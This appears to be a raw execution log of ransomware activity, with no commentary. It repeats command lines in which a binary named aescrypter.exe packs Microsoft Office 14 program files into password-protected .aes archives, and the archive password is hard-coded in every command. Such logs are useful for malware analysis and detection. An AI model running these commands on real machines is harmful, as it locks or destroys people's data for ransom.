"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.XLS.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.XLS" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.DOC" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.XLS.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLV.XLS" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHKEY.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHKEY.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLEX.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLEX.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLTS.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHLTS.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHPHN.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHPHN.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHSRN.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHSRN.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\MSOSEC.XML.aes" "C:\Program Files (x86)\Microsoft Office\Office14\ADDINS\MSOSEC.XML" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\ENGDIC.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\ENGDIC.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\ENGIDX.DAT.aes" "C:\Program Files (x86)\Microsoft Office\Office14\ENGIDX.DAT" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\EXLIRM.XML.aes" "C:\Program Files (x86)\Microsoft Office\Office14\EXLIRM.XML" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\EXLIRMV.XML.aes" "C:\Program Files (x86)\Microsoft Office\Office14\EXLIRMV.XML" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CalendarToolIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CalendarToolIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CalendarToolIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CalendarToolIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\ChessIconImages.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\ChessIconImages.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\ChessIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\ChessIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CreateSpaceImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CreateSpaceImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CreateSpaceImageMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\CreateSpaceImageMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataListIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataListIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataListIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataListIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DiscussionToolIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DiscussionToolIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DiscussionToolIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DiscussionToolIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImageMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Form_StatusImageMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\GRIP.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\GRIP.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\GRIPMASK.BMP.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\GRIPMASK.BMP" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\InformationIcon.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\InformationIcon.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\InformationIconMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\InformationIconMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginDialogBackground.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginDialogBackground.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginTool24x24Images.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginTool24x24Images.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginTool24x24ImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\LoginTool24x24ImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageAttachmentIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageAttachmentIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageAttachmentIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageAttachmentIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageHistoryIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageHistoryIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageHistoryIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\MessageHistoryIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierBackground.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierBackground.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierBackgroundRTL.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierBackgroundRTL.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierCloseButton.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierCloseButton.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDisableDownArrow.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDisableDownArrow.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDisableUpArrow.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDisableUpArrow.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDownArrow.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDownArrow.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierUpArrow.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierUpArrow.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMaskRTL.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMaskRTL.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutlineToolIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutlineToolIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutlineToolIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutlineToolIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutofSyncIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutofSyncIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutofSyncIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\OutofSyncIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\PicturesToolIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\PicturesToolIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\PicturesToolIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\PicturesToolIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\QuestionIcon.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\QuestionIcon.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\QuestionIconMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\QuestionIconMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared16x16Images.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared16x16Images.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared16x16ImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared16x16ImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared24x24Images.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared24x24Images.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared24x24ImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\Shared24x24ImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\SketchIconImages.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\SketchIconImages.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupicons.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupicons.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupiconsmask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\spacebackupiconsmask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\STOPICON.JPG.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\STOPICON.JPG" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\StopIconMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\StopIconMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TaskbarIconImages256Colors.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TaskbarIconImages256Colors.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TaskbarIconImagesMask256Colors.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TaskbarIconImagesMask256Colors.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImageMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImageMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\VeriSignLogo.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\VeriSignLogo.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolImages16x16.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolImages16x16.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolImagesMask16x16.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolImagesMask16x16.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WSSFilesToolIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WSSFilesToolIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WSSFilesToolIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WSSFilesToolIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarToolIconImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarToolIconImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarToolIconImagesMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarToolIconImagesMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarViewButtonImages.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarViewButtonImages.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImage.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImage.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImageMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImageMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Auto.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_Auto.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_AutoMask.bmp.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_AutoMask.bmp" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

"\ProgramData\local\aescrypter.exe" a "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactHigh.jpg.aes" "C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactHigh.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y

C:\ProgramData\local\aescrypter.exe

